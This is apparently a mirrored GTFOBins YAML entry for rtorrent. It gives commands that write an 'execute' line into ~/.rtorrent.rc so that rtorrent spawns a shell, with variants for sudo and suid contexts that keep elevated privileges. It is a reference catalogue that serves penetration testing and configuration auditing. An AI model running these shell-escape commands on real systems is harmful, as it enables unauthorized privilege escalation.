mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 06:31:33 +01:00
18 lines
422 B
Plaintext
18 lines
422 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
echo 'execute = /bin/sh,-c,"/bin/sh </dev/tty >/dev/tty 2>/dev/tty"' >~/.rtorrent.rc
|
|
rtorrent
|
|
comment: |-
|
|
After the shell, exit with `Ctrl-Q`.
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
code: |-
|
|
echo 'execute = /bin/sh,-p,-c,"/bin/sh -p </dev/tty >/dev/tty 2>/dev/tty"' >~/.rtorrent.rc
|
|
rtorrent
|
|
shell: false
|
|
unprivileged:
|
|
...
|